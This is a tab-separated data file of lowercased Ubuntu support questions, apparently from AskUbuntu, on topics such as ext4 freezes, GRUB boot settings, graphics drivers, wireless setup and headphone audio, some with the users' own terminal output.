8746	freezes with ext4 journaling errors	two weeks ago , i installed maverick on my former win7 workstation and since then almost every session ends with a freeze and the reisub trick . i have taken the advice from previous questions of this type ( ram test , hard drive test ) , but none of them yielded anything . however , when i use reisub after a freeze , i sometimes see a lot of ext4 errors saying something about journaling having failed . my hardware is fairly ordinary , i use a huawei gprs modem and a nvidia video card . i 'll be forced to switch back to windows ( where everything worked flawlessly , which makes a hardware failure unlikely imo ) if this does n't get resolved - something which i really would like to avoid . any help is appreciated ! i have written down the errors i got last time the problem happened . they were of the form [ time ] end_request : i/o error , dev sda , sector xxxxxx i received several hundreds of them .
8747	usb to vga video adapter	i 'm having a hard time finding reliable info on this subject , but i 'm looking for a usb to vga ( or dvi ) adapter for a ubuntu 10.10 installation on a laptop . i 'm currently using the regular vga external port of my laptop so i have a dual video output but i 'd like to a third monitor attached to this setup . note : the 2 monitor that i 've got are wide resolution so the dualhead2go is not giving me enough workspace making the resolution really poor and uncomfortable . thanks for your comments , phil
8755	modify monitor color profiles / settings	i ca n't seem to find this anywhere but every other os has this ... how can i just modify the color settings on my monitor , e.g . white balance , gamma , etc ? also , just in case , i 'm on a lenovo thinkpad . here is my graphics card specs : 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 02 )
8756	where is input.h located ?	i ca n't remember what directory this file is found in off hand . does anybody know ?
8758	what to do when keyserver.ubuntu.com is down ?	what happens if i upload a revoke key to another keyserver different to the ubuntu keyserver ; will they be sync automatically ?
8760	can i add custom functions to gcalctool ?	i 've noticed an f ( x ) button in calculator 's ( gcalctool ) advanced mode . the button opens a drop-down list with some predefined functions . is it possible to define more ?
8775	what are the steps for configuring gitosis ?	looking for setup steps for gitosis after installing from apt-get .
8781	tablet pc hardware for ubuntu/linux ?	i 'm in need of an e-book reader , and considering it 'd be yet another thing to throw into my student bag i want to look into tablet computing . now , i do n't really have much love for apple 's stuff , so please do not recommend the ipad ; ipad like , yes . specifically , i 'm looking for a touchscreen tablet that will be able to make use of ubuntu/jolicloud/whatever and allow me to browse the web , play music , watch videos and read books . any suggestions ? : )
8783	why wo n't this application start when i log in ?	i have a file in ~/.config/autostart/ that looks like this : [ desktop entry ] type=application exec=python ~/documents/stackapplet/stackapplet.py icon=/usr/share/pixmaps/stackapplet.png terminal=false comment=a panel indicator for monitoring stackexchange sites name=stackapplet categories=utility ; unfortunately , it is n't working - the application is not starting when i log in . if i open a terminal and copy-and-paste the command listed in exec above , then the application runs just fine . what am i doing wrong ?
8785	how to get a 3 screen setup working- what hardware ?	i am looking to put together a new desktop computer . for the last couple of years i have been using a dell laptop plus an external screen using twin view and this has worked nicely . now i would like to move to a desktop with a 3 screen setup using 1 video card . is this possible , if so what would be the best hardware ( video card ) to use ? if its not possible i can stick with a dual screen setup , but again my questions holds , what video cards would be recommended ? one caveat . i am a hardcore addict with compiz fusion . i ca n't live without out it so the setup has to work with compiz fusion . any input is greatly appreciated !
8787	panel background color , transparency and background image do n't work with ambiance theme	as the title suggests . selecting a background image , color or using the transparency sitting does n't work with the ambiance theme . sections of the panel will take the new settings , but many of the applets including the clock , indicator applet session , indicator applet , rhythmbox icon , tomboy icon , separators and various others retain the ambiance theme background . this carries over through restart . also you can not resize the panel in ambiance above 24 pixels as the background image does n't scale . am i doing something wrong , is it a bug or is it meant to be like that ? i really like ambiance , but am having a hard time using it because of these issues edit : it seems these issues carry over to radiance and new wave as well
8792	optical character recognition software recommendations ?	i have seen some ebooks/papers that were apparently scanned from their paper versions but the text in the ebooks/papers can amazingly be copied out . i suppose the directly-scanned versions must have been processed by some optical character recognition software . so i would like to know what are the recommended optical character recognition softwares ? especially those that are either for ubuntu or free ? if those for windows are far more superior , please let me know as well . i am particularly interested in those ocrs that can accept a scanned pdf file as input and still produce as output another pdf file that looks the same as the input one but with its text copyable . thanks and regards ! please limit one software per answer
8794	window decorations disappeared	i was trying to solve networkmanager icon disappearence , and following some tips i executed this command : rm -rf ~/.gconf/apps/panel not only it did n't worked , but windows decorations disappeared as well ( title , close button , etc ) and who knows what else that i did n't noticed . i found the other question about this issue , but i want a permanent solution ... running metacity -- replace fixes the issue until next login , and adding it to the startup commands sound lame . i want to undo the damage , not put duct tape over it . note : ubuntu 10.10 with compiz new ( partial ) solution : gconftool -- recursive-unset /apps/panel rm -rf ~/.gconf/apps/panel pkill gnome-panel i do n't know exactly what is being done here ( removing a folder , killing a process ) , but my decorations and icons are back . it removed additional icons i had set on the panel , and may have disabled some compiz settings ( i 'm not sure about that , it could be earlier side effect of my various 'fixes ' ) , nothing serious . unfortunately , on the next full restart , decorations missing again .
8797	what is the two-character language code for the latin american keyboard layout ?	i 've created some packs of svg flag icons for the language indicator menu . i 'm expanding it now , and have had a request for a flag for the `` latin american '' layout of spanish . but i ca n't figure out what two-character filename is linked to that layout . it 's not es ( for spanish ) and this list of language codes does n't seem to include anything that fits . does anyone know what the two-character code is for the latin american layout ? ( if you 're interested , the flag packs are posted on gnome look : seperately for dark panels and for light panels ) .
8801	problem renaming files in a ntfs partition	i have one partition with ubuntu and one partition with windows xp , i have also another ntfs partition where i share my files . i ve had many times the problem when i use ubuntu and rename a file located in the ntfs partition , then when i want to use it in windows it appears with no icon and it says `` windows can not read the source file or disc '' , i canâ´t even delete it . regards , victor . i noted that the names of the files were ending with a space so i think windows dont like it . i renamed it in ubuntu and now i can access them .
8803	how can i `` reboot into '' the non-default operating system in a dual-boot configuration ?	when i need to use windows , i : reboot wait for the grub boot menu to appear choose the windows menu item in grub is there a way to just `` reboot into '' windows so that i do n't have to stay at the computer and guide it to the right operating system ? i.e . can i set the default menu item in grub for just the next boot ?
8804	openoffice wo n't run	i click the icon , the splash screen will come up , and then about half way , it will disappear , i ca n't get it to work at all , any possible solutions ? ? i tried to get terminal output , but i could n't seem to get anything
8807	rhythmbox is n't seeing all of my music files	rhythmbox is n't seeing all of my files . i have a library of music over 24,000 tracks all mp3 's . rhythmbox sees 11,500 of them only . this has been a problem for a while . i keep coming back to rhythmbox as its integration with ubuntu is so tight and i like that . but this problem is stopping me from using it . i have tried banshee , but the sound quality is tinny and horrible ( hearing rumors of banshee replacing rhythmbox in 11.04 is giving me nightmares ) i used to use songbird but it was always a bit buggy and they have now pulled linux support . exaile does n't integrate well enough either . i tried guaydeque , and it shows a lot of promise , but again its integration is horrible . is there a way to make rhythmbox see all my mp3 's or is there a music player with tight integration , great sound , good features , gnome native and actively developed i can switch to ? edit : i remember hearing somewhere it had to do with mp3 with variable bit rate ? edit : answers to various comments : took a look and i ca n't see anything specifically the same about all the files that is different from the files it does see . but we are talking about over 10,000 files missing , to large a number for me to be able to draw any accurate conclusions in any timely fashion . not getting any error messages . all i did was set my music library folder to be the folder in preferences and ticked the box to watch the library for new files . it works fine with every other media player i have tried , but every time i try rhythmbox ( several times now over the last couple of years ) it fails to get a the majority of my tracks . my files are all on one external drive in one folder which than has subfolders for each artists and sub folders in those for each album . but that 's as far as it goes for multiple locations , ie its not really multiple locations and no symbolic links . this has been happening across several clean installs across several version of ubuntu .
8811	can i call the gnome restart confirmation prompt from the command line ?	when i click -- > restart , the following prompt appears : can i cause this to appear from the command line ?
8816	where are the root folder names coming from ?	/bin /dev /etc /lib /lost+found /opt /proc /root /sbin /srv /sys /usr /var can anyone tell me where they come from ?
8819	unmounting several partitions at once	i have this portable hard disk with 4 partitions . when i need to safely remove the device i have to unmount each partition manually . is there a way i can unmount all at once ? or is it suffice to unmount one partition only and remove the disk ?
8822	fonts in terminal overlapping	i 'm having a problem with ubuntu where the characters are overlapping each other . how do i set it back to default ?
8824	fonts in message area too small to read in thunderbird	i use thunderbird as my email client . for some reason fonts in the message area are so small that they are unreadable . this includes the thunderbird welcome screen font .
8834	how do i save/remember last-used window position and size for applications ?	when i log in ubuntu , i would like all windows opened at previous session ( terminal and firefox mainly ) to be re-opened automatically at the same size and position . how to proceed ?
8839	start with interactive console shell	this is a follow up question to my prior thread . this solution works very well . however , after booting up , i only see a blinking cursor . crtl+alt+fx , where x=1..4 e.g . invokes a root shell . i want this shell to be there after the initial bootup , without having to invoke further keystrokes . problem is : we have an `` automated keyboard '' controller that just types . if it does n't have a shell , its input is lost : ) i know that this is a very specific problem ... so i 'm extra happy for any answer i get . thanks in advance , wishi
8845	how do i schedule waking up from hibernation ?	is it possible to wake up ubuntu from hibernation at a predefined time ? it should not be wol , but rather ubuntu waking itself up . for example , it should do what the app wakeuponstandby does on ms windows .
8847	how can i change the font size of kde menus and dialogs ... ?	in ubuntu i have installed the kde app konsole . i want to change the default font size of the kde menus and dialogs , etc ... to be larger . ( i do n't mean the font in the konsole 's terminal window . ) how can i do this ?
8848	is there a way to launch gedit in fullscreen mode ?	is there a command i can run to launch gedit in fullscreen mode ?
8854	how can i disable the autostart of brasero when i insert a blank cd/dvd ?	when a blank media inserted , the burning tool automatically started . is there a way to disable that feature ?
8860	cron mail notification	i would like to disable crontab mail notification for one of my task ... i run this task every minute , that means 1440 mail per day : s can someone tell me if this is possible and how can i do this ?
8865	what docks are available ?	what is the best linux dock available ? i 'm looking for a dock that i can customize to make it look the way i like . it needs to be theme-able and have lots of configuration options . please limit one dock solution per answer
8870	enable networking without the gnome-applet	i 've switched to xmonad as my window manager . sometimes when i put my laptop to hibernate , it 's hanging and wo n't shut down . i have to force it off by pressing the powerbutton for 5 seconds . after i boot again , i ca n't connect to the internet . i have to logout , go to gnome , and after logging in , i rightclick the network applet icon and select the enable networking options . after that , my internet is working again . is there a way to do this via the command line or another option ?
8875	how can i solve display glitches and poor performance with ati fglrx driver on my thinkpad x100e ?	i noticed that video performance on my thinkpad x100e was very poor compared to windows 7 , so i installed the ati fglrx proprietary drivers by using the `` additional drivers '' dialogue box . the system has an ati radeon mobility hd 3200 chip . the result of installing the drivers is pretty devastatingly negative , with symptoms such as skewed content in windows , browser tabs and text boxes failing to refresh when their content changes . in fact , please excuse typos in this post , because i ca n't really see what i am typing . : ) i also notice that hd video playback performance is no better - perhaps even worse - than prior to installing the drivers . example of what i see : here 's the output of fglrxinfo : display : :0.0 screen : 0 opengl vendor string : ati technologies inc. opengl renderer string : ati radeon hd 3200 graphics opengl version string : 3.3.10237 compatibility profile context output of lspci | grep -i vga : 01:05.0 vga compatible controller : ati technologies inc rs780m/rs780mn [ radeon hd 3200 graphics ] i 'm on ubuntu 10.10 with kernel 2.6.35-22-generic-pae . what can i try ? many thanks , -r
8877	integrate pidgin into the me menu , or help fix empathy ?	is there any way to integrate pidgin into the me menu , or any other chat applet ? my main problem is that everyone i know uses aim , which empathy jokingly supports . or is there a way to fix empathy to make it show which aim users are mobile ?
8884	what 's the risk of upgrading over ssh ?	when i run sudo do-release-upgrade over ssh , i get the following message . this session appears to be running under ssh . it is not recommended to perform a upgrade over ssh currently because in case of failure it is harder to recover . if you continue , an additional ssh daemon will be started at port '9004 ' . do you want to continue ? what is the real risk of upgrading over ssh ? how does the additional ssh daemon help mitigate this ?
8888	is there such a thing as a restore point in ubuntu ?	windows has this . basically what i want is to record the state of the system either manually or periodically and then restore to that point if required . for example , before upgrading the distribution , or before installing a certain package . what would be the easiest way to do this ?
8890	networkmanager applet shows no networks	i am `` the friend '' referred to in the questions here and here . i decided to come and ask a question myself , as i can still not connect to the wireless network . i downloaded keryx , as suggested here , and managed to download the necessary package and its dependencies . when i attempted to install the packages on ubuntu using keryx , keryx just closed . following this , i installed the packages manually using dpkg , and as far as i can tell , this was successful : kieran @ ubuntu : ~ $ cd /host/wifi/keryx/keryx/projects/kieran/packages kieran @ ubuntu : /host/wifi/keryx/keryx/projects/kieran/packages $ sudo dpkg -i *.deb [ sudo ] password for kieran : selecting previously deselected package bcmwl-kernel-source . ( reading database ... 118296 files and directories currently installed . ) unpacking bcmwl-kernel-source ( from bcmwl-kernel-source_5.60.48.36+bdcom-0ubuntu5_i386.deb ) ... selecting previously deselected package dkms . unpacking dkms ( from dkms_2.1.1.2-3ubuntu1.1_all.deb ) ... selecting previously deselected package fakeroot . unpacking fakeroot ( from fakeroot_1.14.4-1ubuntu1_i386.deb ) ... selecting previously deselected package linux-image . unpacking linux-image ( from linux-image_2.6.35.22.23_i386.deb ) ... selecting previously deselected package menu . unpacking menu ( from menu_2.1.44ubuntu1_i386.deb ) ... selecting previously deselected package patch . unpacking patch ( from patch_2.6-2ubuntu1_i386.deb ) ... setting up fakeroot ( 1.14.4-1ubuntu1 ) ... update-alternatives : using /usr/bin/fakeroot-sysv to provide /usr/bin/fakeroot ( fakeroot ) in auto mode . setting up linux-image ( 2.6.35.22.23 ) ... setting up menu ( 2.1.44ubuntu1 ) ... setting up patch ( 2.6-2ubuntu1 ) ... processing triggers for man-db ... setting up dkms ( 2.1.1.2-3ubuntu1.1 ) ... setting up bcmwl-kernel-source ( 5.60.48.36+bdcom-0ubuntu5 ) ... loading new bcmwl-5.60.48.36+bdcom dkms files ... first installation : checking all kernels ... building only for 2.6.35-22-generic building for architecture i686 building initial module for 2.6.35-22-generic done . wl.ko : running module version sanity check . - original module - no original module exists within this kernel - installation - installing to /lib/modules/2.6.35-22-generic/updates/dkms/ depmod ... .. dkms : install completed . update-initramfs : deferring update ( trigger activated ) processing triggers for install-info ... processing triggers for doc-base ... processing 31 changed 1 added doc-base file ( s ) ... registering documents with scrollkeeper ... processing triggers for menu ... processing triggers for initramfs-tools ... update-initramfs : generating /boot/initrd.img-2.6.35-22-generic warning : no support for locale : en_gb.utf8 after rebooting , however , there were still no wireless networks in the networkmanager applet list . i opened the file /var/lib/networkmanager/networkmanager.state , and both networkenabled and wirelessenabled were set to true . while i 'm very concious i may be asking a stupid question here , both my friend and i have nothing left to suggest , and as such - i would be very grateful for any answers as to how to get wireless working .
8891	how do i set up an mp3 alarm clock ?	i want to switch from windows xp to ubuntu and there is one thing that i 'm heavily using in xp—an mp3 alarm clock . in the evening i turn the pc to hibernated mode . in the morning it wakes up ( based on windows ' scheduler ) and runs a special program that then runs media player with a defined playlist , starts music and then slowly volumes up the sound . so , my question is , are all these features present in ubuntu ? hibernate pc with ease wake up from hibernate in a scheduled moment of time media player that can start playing music automatically ( seems that 's the problem on windows , that 's why i need a special program for that )
8896	remote administration of a server ?	i 'm going to install a ubuntu server to provide email , ftp and maybe webserver services too . i dont want to install a gui for the server , but i 'd like to administrate it remotely . i was thinking in web administration or something else , is there a good package to make these tasks ? ? regards , victor .
8898	how can i quickly recompile the kernel after changing the configuration ?	i 'm trying to fix a suspend problem on my dell inspiron 600m . i think the problem is that the video driver modules are n't being reloaded properly . so , i 'm going to try to compile the video drivers into the kernel proper rather than keeping them as external modules . i just want to know if i can get away from running : fakeroot debian/rules clean before building the kernel with : skipabi=true skipmodule=true fakeroot debian/rules binary-core2 where core2 is my custom configured kernel . this will work and i get a clean kernel package that i can compile , but compilation can take up to 3 hours on my machine so i 'd like to only rebuild what i need to and try to keep some of the *.o files around so i can just link them rather than recompile them . thanks
8900	how do i connect with my verizon mobile broadband dongle ?	when i try and set up my mobile connection through the connection wizard it does n't work at all . there is no indication that my computer even recognizes it . any pointers ? this is a verizon dongle .
8905	how can i get the grub menu on boot ?	this is for a friend 's toshiba portege laptop with ubuntu 10.4.1 on it . they want the original windows xp for tablet pc installed ; they do have the disk , but the portege seems unable to boot from a generic non-toshiba usb cd drive ( and the toshiba one that came with it is broken for years now ) . so i found out about plop . i followed the instructions ( modified ; i touched /etc/grub.d/40_custom or something ) and now the executable '/boot/plpbt.bin ' ( i copied it there of course ) is included as an option ( i hope ! i ran update-grub2 and update-grub and verified that the custom menu option exists in /boot/grub/grub.cfg ) . i can not bring up the grub menu at boot ; esc unfortunately jumps to the portege bios , and i have n't managed to succeed in getting grub to choose the plop boot manager . how can i bring up the grub menu on boot ?
8911	how can i make shutter open at startup ?	how can i make the application , shutter ( takes screenshots ) open at startup ? i know about sys > prefs > statup applications , but after i go to add what do i fill out the form with ? shutter is n't a command , is it ?
8912	how do i delete my last panel ?	the last panel on gnome is being a pain to delete . i 've tried the gconfig editor or whatever and going to desktop - > sessions and deleting the required applet text . then when i kill it through the task manager it still just reopens itself , being a pain . is there any other way to delete the last gnome panel ? i do n't want any of them at the moment , just my dock .
8918	how to make skype use notify-osd ?	how do i make skype use the default ubuntu notify-osd to display notifications ( incoming messages , users connecting , etc . ) instead of the skype 's own `` ugly '' message box ?
8919	can i make grub2 boot from a cd in an external usb cd drive ?	i would like to boot from an external usb cd/dvd drive on a toshiba portege which ca n't . i 've tried with plop , but have n't had any luck .
8923	apticron email setting format for multiple recipients ?	what is the format for multiple emails in /etc/apticron/apticron.conf ? should it be email= '' user1 @ example.com '' `` user2 @ example.com '' or email= '' user1 @ example.com user2 @ example.com ''
8925	command to launch the alt+f2 window ?	i removed all of my gnome-panel 's in favor of the avant window manager for a number of reasons , and would really like to not have to have a gnome-panel still just being hidden . is there a command to launch the alt+f2 window without having a gnome-panel active ? i 'd like to add an icon to my dock that launches that window , or a window that let 's me run a command like that one .
8926	a good video editor/creation tool	i 'm looking for a good video editor/creation app for ubuntu . something similar to that on windows would work just fine for my purposes . i would prefer something that could add in titles and transitions . any suggestions would be appreciated ! oh , and the video file type does n't make a huge different for my need either .
8933	pipe results of locate into rm	i tried running locate *.orig | xargs rm but it said no such file or directory i 've seen ways to do it with find but locate returns the full path to the object so it should be possible
8937	killing a running process in an ubuntu machine remotely from a windows machine which is in lan	is it possible to kill a process running in an ubuntu machine from a windows ( xp ) machine remotely connected via lan ? i can kill the process in a windows machine from a remote windows machine ( in lan ) by the following command , taskkill /s system /u username /p password /im process.exe is there any thing like that to kill the process running in the linux machine ?
8947	player for rtmp : // protocol ?	is there a player for the rtmp : // ( flash streaming ) protocol ?
8952	command to check graphics device and graphics driver	is there a utility or terminal command to tell you what graphics device and driver you are using ?
8964	how do i transfer files over ssh after sudo ?	i have access to a box over ssh and there are some files i 'd like to transfer to another machine , but those are only accessible under another account so if i ssh with 1 , then sudo 2 i can browse them what i want actually is mirror copy them over to my windows based pc how can i achieve that if only ssh is available .
8968	ca n't get rid of fake floppy drive	in my system it says i have `` floppy0 '' mounted and i ca n't get rid of it . it is n't a real drive of any sort , since my computer does n't even have a disk drive , when i click on it it says `` unable to mount floppy0 :
8971	creating a directory of recently created files	on a system i have , files are uploaded through a series of various mechanisms into one central `` incoming '' directory . once a day those files are processed and they are moved off to where they need to be ( that logic is n't relevant here ) . they end up in a subdirectory of /files/ . i guess a simple ( albeit inaccurate in my specific case ) would be to say that files that start with `` a '' get moved to /files/a/afile . so i have a load of subdirectories in /files/ . that 's great and it works for me . however the client has just told me that it would be nice if there could be a `` recently added '' directory where files from the past week are available . my first thought was to create a directory called /recent-files/ and extend the file processing script to do the following after it moves files out of /incoming/ : delete all files from within /recent-files/ scan /files/ for any file ( not directory ) created within a week create a symlink for each to its real path and stick it in /recent-files/ sounds like it would work but my bash is still pretty weak when it comes to arithmetic and file-creation dates . can anybody lend me a hand crafting a find ... -exec ... statement that approximates parts two and three ? of course , if there 's another way of creating a command-line and nfs visible `` search directory '' , let me know .
8974	how to auto-expand all sub-directory levels in nautilus tree view , via the keyboard ?	in nautilus tree-view , pressing * ( asterisk ) expands the selected directory structure by one level . pressing * again will expand the structure by one more level . ... etc , etc , untl all levels are expanded . is there some way to expand all levels in just a single action ? .
8976	app to create a video from an mp3 file and gif picture ( s ) ?	is there a an app that allows me to create a video from an mp3 file ( as audio stream ) and one , or more pictures , such as gif , png , jpg ( animated or not ) ? so far i 've found pitivi , which appears to do the job , however the video always seems to be rather long ... around 13 minutes , to be specific . kino does n't appear to allow input / import of mp3 or raw pictures , and avidemux does n't seem to be able to create `` new '' videos . a windows application would be fine too , as long as it runs with wine , and does n't charge money ... update : i 've tried pitivi , but as mentioned before , it keeps adding additional `` silent minutes '' to the resulting video , which is usually uo to 13 minutes .
8977	connect my mobile phone as modem ?	i have mobile phone `` sony ericsson c510 '' , i can connect the phone via cable as modem and through windows7 i can make it connect to internet via phone connection . can i do that in ubuntu ? notice my phone have option when i connect them called `` other os e.g mac , linux ''
8980	the best video capture software for gnome	having been looking for a tool to record the activities of desktop for a long time . someone recommend the recorditnow to me.but i found it is made for kde.and the tool sometimes collapsed . can anyone recommend a software which is more suit to gnome to record screen with the form of video . it seemed that if i choose the desktop for output , there will no files converted.so i change some in the bash script . # ! /bin/bash video= $ ( zenity -- file-selection ) mencoder $ { video } -o ./output.avi -oac lavc -lavcopts acodec=libfaac : abitrate=128 ovc lavc -lavcopts vcodec=mpeg4 : vbitrate=4000 errors : audio lavc , could n't find encoder for codec libfaac . completed errors : mencoder svn-r1.0~rc3+svn20090426-4.4.3 ( c ) 2000-2009 mplayer team success : format : 0 data : 0x0 - 0xdf2a8e [ ogg ] stream 1 : video ( theora v3.2.1 ) , -vid 0 [ ogg ] stream 2 : audio ( vorbis ) , -aid 0 ogg file format detected . video : [ theo ] 1440x896 24bpp 15.000 fps 0.0 kbps ( 0.0 kbyte/s ) [ v ] filefmt:18 fourcc:0x6f656874 size:1440x896 fps:15.000 ftime : =0.0667 ========================================================================== opening audio decoder : [ ffmpeg ] ffmpeg/libavcodec audio decoders audio : 22050 hz , 1 ch , s16le , 90.0 kbit/25.51 % ( ratio : 11248- > 44100 ) selected audio codec : [ ffvorbis ] afm : ffmpeg ( ffmpeg vorbis ) ========================================================================== opening video filter : [ expand osd=1 ] expand : -1 x -1 , -1 ; -1 , osd : 1 , aspect : 0.000000 , round : 1 ========================================================================== opening video decoder : [ ffmpeg ] ffmpeg 's libavcodec codec family vdecoder init failed : ( opening video decoder : [ theora ] theora/vp3 vdec : vo config request - 1440 x 896 ( preferred colorspace : planar yv12 ) vdec : using planar yv12 as output csp ( no 0 ) movie-aspect is 1.61:1 - prescaling to correct movie aspect . videocodec : libavcodec ( 1440x896 fourcc=34504d46 [ fmp4 ] ) selected video codec : [ theora ] vfm : theora ( theora ( free , reworked vp3 ) ) ========================================================================== exiting ... ogg stream 0 is of an unknown type [ theora @ 0x24e8800 ] missing extradata ! could not open codec . audio lavc , could n't find encoder for codec libfaac . there is a output file named `` output.avi '' .but it ca n't be played.can the format ogv of output can be changed ?
8985	when purchasing software , how many releases of ubuntu will that software be available to me ?	as in the title , if i purchase software and install the next version of ubuntu will i have to purchase it again ?
8986	switching users freezes desktop	since i upgraded from 10.04 to 10.10 , i 've been having problems switching between users . when i run logout > switch user in x , the screen often stops updating and the keyboard stops responding to input ( the leds do n't update ) . occasionally , switching users will work , but switching back often causes the same freeze . switching to a text console also occasionally freezes the machine . i 've got onboard 865g intel graphics card . lspci -k tells me : 00:02.0 vga compatible controller : intel corporation 82865g integrated graphics controller ( rev 02 ) subsystem : ibm device 0285 kernel driver in use : i915 kernel modules : i915 i do n't know if it 's related , but x does n't always seem to update when the screen changes . when i hide guake , the screen does n't always update . i did n't have this problem before i upgraded . how do i fix this ?
8994	which process creates the 'desktop ' folder ?	i do n't use gnome nor kde desktops because my system is n't as fast as they require it to be , but even when i do n't use them , a 'desktop ' folder is always in my home dir , i 've delete it several times before but it 's again there when i reboot the system , what do i need to do in order to delete it for ever ?
8998	why does kde 's konsole not have top-level menu-accelerator keys ? is it a bug ? is there a workaround ?	i am using ubuntu 10.04 lucid ( 32 ) . i have installed kde 's konsole ( terminal ) , as it offers a couple of things i ca n't currently get in the gnome-terminal . however there is a fly in the soup ... on any day of the week , i prefer to use the keyboard over the mouse ; wherever possible ... but for some reason konsole 's menu does not respond to the typical ( and expected ) alt-f to open up the file menu , etc ... to see if it was just a conflict between konsole and the gnome desktop , i donwloaded kubuntu 10.04 , and installed it into a vm ... with the same result : no menu accelerators for konsole ( only ) ! all other kde apps seem to have normally functional menu-accelerator keys ... so i am left wondering why konsole is different ! ? ... and is there a fix for this ? update : the accelerators in question refer to the first menu-level only . ie to the items shown in menu-bar ( not in the sub-menus ) .
8999	nautilus elementary coverflow not working	i installed it and press f4 and nothing happens . can anyone help me ? thanks .
9000	how do i reduce the number of wait seconds grub waits before launching ubuntu 10.10 ?	i have a dual boot configuration with ubuntu 10.10 and windows . what 's the best way to configure grub so that the wait time is 2 seconds instead of 10 seconds ?
9003	how do i fix an internal laptop monitor showing up as unknown connection ?	i 'm new to linux and ubuntu and trying it out but installing 10.10 via wubi on to my old samsung v25 laptop . for the larger part , the system seems to be working fine , apart from one key point , its internal monitor is not functional , only output to an external monitor works . during install and the gui section of setup , ( where the slideshow is displayed , after the windows part ) , displayed correctly on the internal monitor , however , after the first reboot , as soon as the splash screen displays on my external monitor , the internal one shuts off completely . not blank , it appears entirely turned off . the graphics card is reported by lspci -nn as an 'intel corporation 82845/g/gl [ brookdale-g ] /ge chipset integrated graphics device [ 8086:2562 ] ( rev 03 ) ' . with some help of friends , i 've run xrandr but it reports lvds1 , the laptop screen as 'unknown connection ' . trying to force display through it at a known safe resolution causes the error : `` can not find crtc for output lvds1 '' how can i fix this so i can use the laptop with just its internal monitor rather than having to hook it up to another screen ? update : having done further searching online , i have now got the system to the point of being able to boot to text mode at 800x600 and , if an external monitor is connected , boot in to graphics mode . if the external monitor is not connected , graphics fails to start but i can at least ctrl+alt+f1 to the terminal . to do this , i added i915.modeset=0 xforcevesa to the boot instruction . along with setting grub_gfxmode and grub_gfxpayload to 800x600 . and set the driver in the device section of xorg.conf to vesa . now my only requirement is setting the laptop to boot with graphics mode without needing an external monitor connected .
9012	what gis ( geographic information system ) software is available ?	native gis software for ubuntu ( linux ) ? the most famous is grass and qgis but it is not the only gis software , is it ?
9014	auto-connect to hidden wireless without elevating privelege	when i boot my laptop into ubuntu 10.10 , the wireless wo n't automatically connect ; it is configured , and i can get a connection using `` connect to hidden wireless network ... '' and selecting the name from the drop-down - however , the first time ( per boot ) i do this , it asks me to elevate myself . the connection works if i then surrender the elevated privilege . the connection is set as available to all users , and to connect automatically . what i would like is that it silently and automatically connect to the wireless . how can i do that ?
9017	how do i recover my root password ?	i 'm trying to install the netbeans ide in my ubuntu and in the process it 's asking for my root password which i do n't remember . i know my sudo user password . how can i recover my root password ?
9023	how do i know what sound system is being used ?	i 've noticed there is alsa , oss , and pulseaudio . how do i know what i 'm using ? ( i 'm running mythbuntu 10.04 and i want to figure out how to make all apps - vlc , basero etc output via the spdif ) .
9024	where are my installed applications ?	i have installed skype in ubuntu but duuno where to start the installed the skype application .similarly i have installed netbeans and many applications but after installing them their icon 's are not appearing in any menus . similarly how to uninstal already installed applications ?
9025	how can i search for the fastest update server on the command line ?	this is easily done through the gui , but can it be done from the command line ? i have a bash script for installing systems from the minimal iso , and it would be nice to have the option of hunting down the fastest mirror before installing tons of packages .
9031	why is the resolution incorrectly set on boot after installing the nvidia drivers ?	after installing the native nvidia drivers on my ubuntu 10.10 , my boot screen resolution has been reset to 640x480 or so ... i tried to fix it by following these steps : http : //idyllictux.wordpress.com/2010/04/26/lucidubuntu-10-04-high-resolution-plymouth-virtual-terminal-for-atinvidia-cards-with-proprietaryrestricted-driver/ actually , the resolution is now 1440x900 but my splashscreen at boot is on the leftside.. i mean that logo with progressbar is on the middle left and not directly in the middle ...
9036	why is openssh-server needed to receive incoming ssh connections ?	why is it needed ? ca n't i just give an address : port and just `` connect '' ?
9037	a complete free guide for game development in python or c #	that 's what i know : c # ; python ; what is opengl ; what is sdl ( barely ) ; now i 'd like to make a sketch for a 2d platform game ( i.e . a ball that has to avoid some obstacles till reaches the end of the level ) in order to understand how does a game works ( physics , events , collisions , drawing , sprites ) . so the question is : where to start ? i need a book , a pdf , a website that says to me '' open monodevelop , start a new project then this is the skeleton of main class . now you need to manage physics in this way . as physics are finished you need to care about level drawing in this way . now you need to create sprites in this way ... '' i 'm also searching for team-mates or someone that wants to start this `` adventure '' with me .
9038	why does every window fade when i rotate the desktop cube ?	i am setting up a laptop for a friend with ubuntu 10.10 . i turned on fancy visual effects and the `` desktop cube '' plugin as well . when i rotate the cube every window and even the wallpaper gets dark and desaturated . i tried looking into other plugins , even turning them off , other gnome options , and i could n't figure out why this fading happens . i 've set up various computers with ubuntu before but i have never seen such a problem . how could i turn the fading off and keep the visual effects ?
9040	no audio with headphones , but audio works with integrated speakers	my speakers work correctly , but when i plug in my headphones , they do n't work . i am running ubuntu 10.04 . my audio card is realtek alc259 my laptop model is a hp g62t a10em in another thread someone fixed a similar issue ( headphones work , speakers not ) folowing this : sudo vi /etc/modprobe.d/alsa-base.conf ( or some other editor instead of vi ) append the following at the end of the file : alias snd-card-0 snd-hda-intel options snd-hda-intel model=auto reboot but it doesnt work for me . before making and changes to alsa , this was the output : alsamixer gives me this : things i did : followed this howto but now no hardware seems to be present ( before , there were 2 items listed ) : now , alsamixer gives me this : alsamixer : relocation error : alsamixer : symbol snd_mixer_get_hctl , version alsa_0.9 not defined in file libasound.so.2 with link time reference i guess there was and error in the alsa-driver install so i began reinstalling it . cd alsa-driver* //this works fine// sudo ./configure -- with-cards=hda-intel -- with-kernel=/usr/src/linux-headers- $ ( uname -r ) //this works fine// sudo make //this does n't work . see ouput error below// sudo make install final lines of sudo make : hpetimer.c : in function ‘snd_hpet_open’ : hpetimer.c:41 : warning : implicit declaration of function ‘hpet_register’ hpetimer.c:44 : warning : implicit declaration of function ‘hpet_control’ hpetimer.c:44 : error : expected expression before ‘unsigned’ hpetimer.c : in function ‘snd_hpet_close’ : hpetimer.c:51 : warning : implicit declaration of function ‘hpet_unregister’ hpetimer.c:52 : error : invalid use of undefined type ‘struct hpet_task’ hpetimer.c : in function ‘hpetimer_init’ : hpetimer.c:88 : error : ‘einval’ undeclared ( first use in this function ) hpetimer.c:99 : error : invalid use of undefined type ‘struct hpet_task’ hpetimer.c:100 : error : invalid use of undefined type ‘struct hpet_task’ hpetimer.c : at top level : hpetimer.c:121 : warning : excess elements in struct initializer hpetimer.c:121 : warning : ( near initialization for ‘__param_frequency’ ) hpetimer.c:121 : warning : 